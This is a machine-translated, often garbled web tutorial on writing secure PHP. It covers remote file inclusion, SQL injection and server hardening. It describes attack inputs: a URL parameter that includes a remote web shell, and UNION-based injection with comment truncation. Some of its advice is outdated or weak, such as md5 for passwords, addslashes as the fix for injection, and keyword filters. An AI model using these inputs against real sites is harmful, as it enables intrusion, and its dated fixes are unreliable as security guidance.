Home
Home Page
In detail about Robots.txt
Safe programming on PHP
We write elementary rassylhhik
Use of HTML-tables for a conclusion of diagrams
What is dorvei? Whether Banjat for them?
How to learn{find out} on what searches find my site in search machines?
Cunnings of tabulared design. (we form a framework of the table)
The guest book on PHP
BB-codes
We hide counters
Use of patterns of design in ASP.NET
RSS the generator
Search optimization of a site
Metatags
Optimization for MSN
We
Cookies - fresh rolls
Superdynamical webs - interfaces
Links
topic
 

Safe programming on PHP

In this clause{article} I want to tell main principles of safe programming on PHP. On a spelling of clause{article} of me has pushed that fact, that on the Internet it is a lot of clauses{articles} about that how to crack sites through holes in PHP-skrpitakh, but it is not enough advice{councils} (and all of them are scattered) how to not do{make} mistakes through which the site can be cracked. I have decided to divide{share} clause{article} into some parts, each of which is devoted to what that to type of mistakes and an example as this mistake to avoid. At the end of clause{article} I want to give the general{common} advice{councils}. So, we shall start.



Include-bug


It is very old and almost all a known bug in scripts, but unfortunately till now very actual. c-cija include () (its{her} analogue: inslude_once ()) serves to attach to a PHP-code new modules on PHP. The most often mistake with this kh-cej is the code: include ("$file"), and the variable $file undertakes from parameter to a script (for example, qwe.php? file=index.php). The hacker simply needs to create on the host a PHP-file about a web - shelom (http: // www.web-hack.ru/download/info.php? go=77) and to pass in parameter to a script the address of the a web - shela (for example, qwe.php? file=http: // web-hack.ru/shell.php). The truth in this situation can rescue a victim, that in config PHP is forbidden inkludit` a file from other servers.

The decision of a problem with a Include-bug is absence of a variable transmitted in search to a script, for inkluda. In such cases it is possible to use a design with the operator switch, for example so:



switch ($case) // $case - a name of a variable transmitted to parameter to a script

{

case news:

include ("news.php");

break;


case articles:

include ("articles.php");

break;


... //, etc.


default:

include ("index.php"); // if in a variable $case value which is taken into account{discounted} above the main page opens will not be transferred{handed}

break;

}


Many naive programmers think, that if they will make a design such as include ("$file.php") them cannot break. They deeply are mistaken! First, in old versions PHP (for example, PHP <=4.0.3pl1) was present a bug null-byte (familiar still from Perl), which allowed to reject expansion (and in general, everything after a variable) a file. Second, even if version PHP on the server new it is possible proinkludit` any php-file on it the server (if the rights to his  reading will suffice), and too to not eat with it well. So remember advice{council}: whenever possible NEVER pass variables through parameter to a script, which will participate then in kh-cii include (). I certainly understand, that it is possible to make abrupt filters on this variable but as practice - " Berezhennogo shows - the god protects ". All is higher described as concerns to kh-cijam: fopen (), require (), require_once () and inslude_once ().


As recommending in config PHP to establish register_globals=off (since version 4.2.0 the variable is switched off by default), since if you dvizhek uses modules and in what that the module is a line include ("$file"), and value of a variable $file is set not in this module, and in the main file the hacker can pass $file through parameter to a file of the module in a browser.



SQL-injections


It is more and more and more coders start to do{make} in the scripts interaction with databases. As a rule, it is used MySQL (less often MSSQL). In given clause{article} I shall tell about measures of protection PHP+MySQL since with MSSQL I do not work also she gives much more opportunities for a hacker, than MySQL. The essence ujazvimostej such type consists that through variables which are passed through parameter to a script and participate in SQL-search, the malefactor can introduce the SQL-code and by that to modify search to a DB. I shall not concentrate attention in detail on the principle of SQL-injections, and I shall simply tell as them to avoid. Those who wants to learn{find out} how there are SQL-injections, can read about them here (http://rst.void.ru/texts/sql-inj.txt). I shall result not the big example:



SELECT * FROM table WHERE user = ' $ go '


Admit{Allow} this variable $go it is passed as parameter to a script and it is carried out SQL-kommanda. All is good, that the hacker can as value to change pass user=lamer ' (pay attention on kavychku) and itself to close a condition, and further to introduce through kh-ciju UNION (this kh-cija has appeared with MySQL4 so in earlier versions in``kcija will fail) other SELECT command and by that to receive the confidential information from base (for example, passwords) if its{her} structure learns{finds out}. If after a condition there would be still what that other conditions (not necessary to a hacker) he could cut off them easily so "-" or so " / * " (these symbols in MySQL mean the further comment). By the way, in MSSQL zloumyshlennic could put a symbol ";" (the meaning end of the command) and to introduce new (for example, INSERT, UPDATE, etc.).


For the decision of a problem with SQL-injections it is necessary for us to filter transmitted in SQL-kommande variables. It is reached{achieved} by the next ways:

1) Never overlook to put values in inverted commas (it is useful to us for the further kill of variables). I.e. so user = ' $ go ', instead of so user = $ go! By the way, if the variable is number its{her} value too can be specified so-called.

2) If the variable is number to secure her  it is possible very easily, necessary to lead simply means PHP her  to to numerical type:

$go = (int) $go; or $go=intval ($go);

3) If the variable is not number we need to trace simply absence of inverted commas, it can be achieved kh-ciej mysql_escape_string () (its{her} analogue is addslashes ()). c-cija is intended to put a slash before kavychkoj (\ '). Now even if the hacker will try to introduce the SQL-code he will not transcend inverted commas.


If you are the paranoiac can make kill on the basic kh-cii in MySQL which are used for injections: UNION and CHAR.



Advice{Councils}


1) It is desirable to not create configs which can be read from a web. A config it is necessary to put above folders of the web - server or to create in such type of a file which cannot be read from a browser (for example, *.inc not on all webs - servers it is started, as a PHP-script, and simply opens as a text file). So give names to such files with expansion *.php.

2) Never do{make} the password on access to SQL-base same, as well as on FTP. And if at you on a hosting by default and it is made (passwords identical) demand from khostera that he has made their different since if the hacker will receive webs - went on the server and can read a config with the password to SQL-base => can receive FTP-access.

3) Cipher all passwords of access to the various closed zones special kh-cijami, for example md5 (). If the hacker can receive base with such passwords will decipher them is problematic.

4) Watch{Keep up} for obnovlenijami version PHP (http://www.php.net) and in due time update her  at an output{exit} of the new stable version because not only the PHP-code can harbour vulnerability, but also the interpreter of language (I I think everyone remember about PHP 4.0.2-4.0.7 which allowed to open far off web - went).

5) Whenever possible give not widespread names to configs with passwords (cfg.php, etc., instead of config.php or conf.php), since it will complicate search of configs with the help of search on files of the server (find /-name conf *) a hacker.

6) Do not neglect an opportunity to make HTTP-autifikaciju means PHP, it is especial if there is no opportunity it to make at a level of the Apache (.htaccess and .htpasswd). In more detail about such kind autifikacii and other kinds can read in a series of clauses{articles} " Authorization of access " (http: // www.web-hack.ru/books/books.php? go=37).

7) Whenever possible hold yours PHP in a mode safe mode (safe_mode=on). As I advise to cut down initialization of global variables (register_globals=off) and an opportunity fonen () to open addresses from a web (allow_url_fopen=off). Still it is possible to forbid dangerous kh-cii:

disable_functions=phpinfo, system, passthru

8) If write a guestbook, etc. do not overlook to put kill in all forms (nik, a soap, etc.) on tegi about the help kh-cii htmlspecialchars (). By the way, if in a body of messages it is necessary to use tegi it is better to make the (type [B] [/B], etc.) instead of to do{make} filters on prohibition not necessary.

9) Cipher source codes on PHP and it is especial configs with help Zend Optimizer (<http: // www.zend.com>).